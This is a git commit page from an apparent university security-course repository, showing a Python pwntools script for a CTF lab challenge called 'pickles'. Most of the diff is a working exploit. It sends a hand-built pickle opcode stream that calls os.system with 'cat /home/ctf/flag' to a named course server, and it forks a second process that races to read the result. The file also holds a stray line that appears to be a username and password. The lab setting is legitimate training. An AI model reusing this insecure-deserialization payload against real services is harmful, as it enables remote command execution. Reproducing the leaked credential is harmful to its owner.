didas/ssof_labs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

lab3

Browse Source
This commit is contained in:
didas72
2025-11-27 19:11:06 +00:00
parent d2382a36dc
commit 063094f2a2
7 changed files with 400 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files

34
pa/lab3/chall_pickles.py
View File

@@ -1,9 +1,37 @@
from pwn import *
from os import fork, kill
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25653
conn = remote(HOST, PORT)
line = conn.interactive()
PAYLOAD = "cat /home/ctf/flag"
SSof_148:BHdrm8TgNq
pid = fork()
if pid != 0:
while True:
conn = remote(HOST, PORT)
conn.sendlineafter(b":", b"didas")
conn.sendlineafter(b">>>", b"1")
conn.sendlineafter(b">>>", b"1")
conn.sendlineafter(b":", b"bomb")
conn.recvuntil(b":")
conn.sendline(b"cos")
conn.sendline(b"system")
conn.sendline(("(S'"+PAYLOAD+"'").encode('utf-8'))
conn.sendline(b"tR.")
conn.sendline(b"\n\n\n")
conn.close()
else:
while True:
conn = remote(HOST, PORT)
conn.sendlineafter(b":", b"didas")
conn.sendlineafter(b">>>", b"0")
conn.sendlineafter(b">>>", b"0")
conn.sendlineafter(b":", b"bomb")
res = conn.recvline().decode('utf-8')
if "[ERROR]" not in res:
print(res)
kill(pid, 9)
break